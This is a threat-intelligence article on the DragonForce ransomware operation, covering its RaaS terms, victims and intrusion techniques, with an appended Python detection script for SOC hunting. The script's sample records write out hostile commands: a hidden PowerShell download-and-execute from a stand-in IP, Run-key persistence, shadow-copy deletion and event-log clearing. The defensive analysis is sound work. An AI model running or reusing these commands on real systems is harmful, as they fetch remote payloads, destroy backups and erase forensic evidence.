DragonForce’s RaaS Operation Launches Widespread Attacks with 82 Victims and Counting
The DragonForce ransomware group emerged as a notable threat actor in August 2023, and by June 26, 2024, the gang had launched a Ransomware-as-a-Service (RaaS) affiliate program. According to findings from Group-IB, DragonForce has been linked to two primary ransomware variants, both of which are based on a leaked LockBit 3.0 builder and ContiV3 code. Between their emergence in 2023 and August 2024, DragonForce compromised at least 82 victims across various sectors. The top five targeted sectors include manufacturing (12 attacks), real estate (11), transportation (10), healthcare (6), and commerce & shopping (4). Geographically, the United States has been the most affected, with 43 attacks, followed by 10 attacks in the United Kingdom and 5 in Australia. DragonForce provides affiliates with a payout structure that includes "80% of the ransom proceeds, along with tools for automating attack management." Affiliates are able to customize ransomware samples, adjust encryption settings, disable security features, and personalize ransom notes, demonstrating the flexibility of the RaaS program.
As with many ransomware groups, DragonForce employs a double extortion strategy, which involves encrypting the victim’s data while also exfiltrating sensitive information. They advertise their ransomware services on dark web forums and maintain a Dedicated Leak Site (DLS), where compromised company IDs and account details are publicly shared. Group-IB’s analysis of the DragonForce control panel reveals affiliate capabilities, including tracking compromised entities under a "Clients" section, listing entities published on the DLS, a "Constructor" page to schedule publications, and a configurable ransomware builder.
In a documented DragonForce attack that occurred in September 2023, Group-IB reports that the threat actors gained unauthorized access to a public-facing web server using valid domain credentials. Three separate IP addresses were observed during this access attempt. Once inside, the attackers used PowerShell in a hidden window with Invoke-Expression to download a Cobalt Strike beacon, establishing their command and control (C2) infrastructure. The attackers achieved persistence by adding their SystemBC malware to the Run registry key, alongside setting up Windows services and scheduled tasks. For credential theft, they used Mimikatz to extract credentials from LSASS memory. During the reconnaissance phase, the attackers deployed AdFind and a tool named "netscanold.exe" for network scanning. Lateral movement was conducted through Remote Desktop Protocol (RDP) sessions, initiated after gaining initial access to the public-facing web application server, according to Group-IB.
During these RDP sessions, the attackers expanded their activities to other hosts. They utilized the “Bring Your Own Vulnerable Driver” (BYOVD) technique to disable security monitoring tools and response solutions. After the encryption process, they deleted Windows Event Logs to impede forensic investigations. Additionally, the group used anti-analysis techniques inherited from Conti, such as obfuscating strings with ADVobfuscator and resolving APIs through hashed functions, making reverse engineering more difficult. To further cripple system recovery efforts and ensure the success of their ransomware, DragonForce deleted shadow copies using COM objects and WMIC commands, preventing victims from restoring encrypted files from local backups.
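The command-line behaviours Group-IB describes above (a hidden PowerShell Invoke-Expression download, Run-key persistence, shadow-copy deletion via WMIC, and event-log clearing) are the kind a SOC would hunt for in process-creation telemetry. The Python below is an added example, not code from Group-IB or the article: it runs simple regex rules over constructed Sysmon-style records and flags any host that shows two or more of the described tactics. The hostnames, file paths and the 192.0.2.10 address are constructed sample values.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style); not from any real incident.
SAMPLE_EVENTS = [
    {"host": "web01", "cmdline": "powershell.exe -w hidden -c \"iex (New-Object Net.WebClient)"
                                 ".DownloadString('http://192.0.2.10/b')\""},
    {"host": "web01", "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
                                 r" /v svc /t REG_SZ /d C:\Users\Public\sb.exe"},
    {"host": "fs02", "cmdline": "wmic shadowcopy delete"},
    {"host": "fs02", "cmdline": "wevtutil cl Security"},
    {"host": "dc01", "cmdline": r"notepad.exe C:\notes.txt"},   # benign control record
]

# (rule name, tactic as described in the article, pattern over the command line)
RULES = [
    ("hidden_powershell_iex_download", "Command and Control",
     re.compile(r"powershell.*-w(indowstyle)?\s+hidden.*(iex|invoke-expression)"
                r".*(downloadstring|downloadfile|net\.webclient)", re.I)),
    ("run_key_persistence", "Persistence",
     re.compile(r"reg(\.exe)?\s+add\s+.*\\CurrentVersion\\Run\b", re.I)),
    ("shadow_copy_deletion", "Impact",
     re.compile(r"wmic.*shadowcopy\s+delete|vssadmin.*delete\s+shadows", re.I)),
    ("event_log_cleared", "Defense Evasion",
     re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
]


def match_event(event):
    """Return the names of all rules whose pattern matches this event's command line."""
    return [name for name, _, pat in RULES if pat.search(event["cmdline"])]


def triage(events):
    """Group rule hits per host by tactic; two or more distinct tactics on one host
    is treated as a likely intrusion chain rather than an isolated admin action."""
    tactic_of = {name: tactic for name, tactic, _ in RULES}
    per_host = {}
    for ev in events:
        for name in match_event(ev):
            per_host.setdefault(ev["host"], {}).setdefault(tactic_of[name], []).append(name)
    return {host: {"tactics": sorted(hits), "chain": len(hits) >= 2}
            for host, hits in per_host.items()}


if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_EVENTS).items():
        print(host, verdict)
```

A real deployment would feed this from an EDR or SIEM export and tune the patterns to the environment's legitimate admin tooling, since `wevtutil` and `reg add` also appear in benign automation.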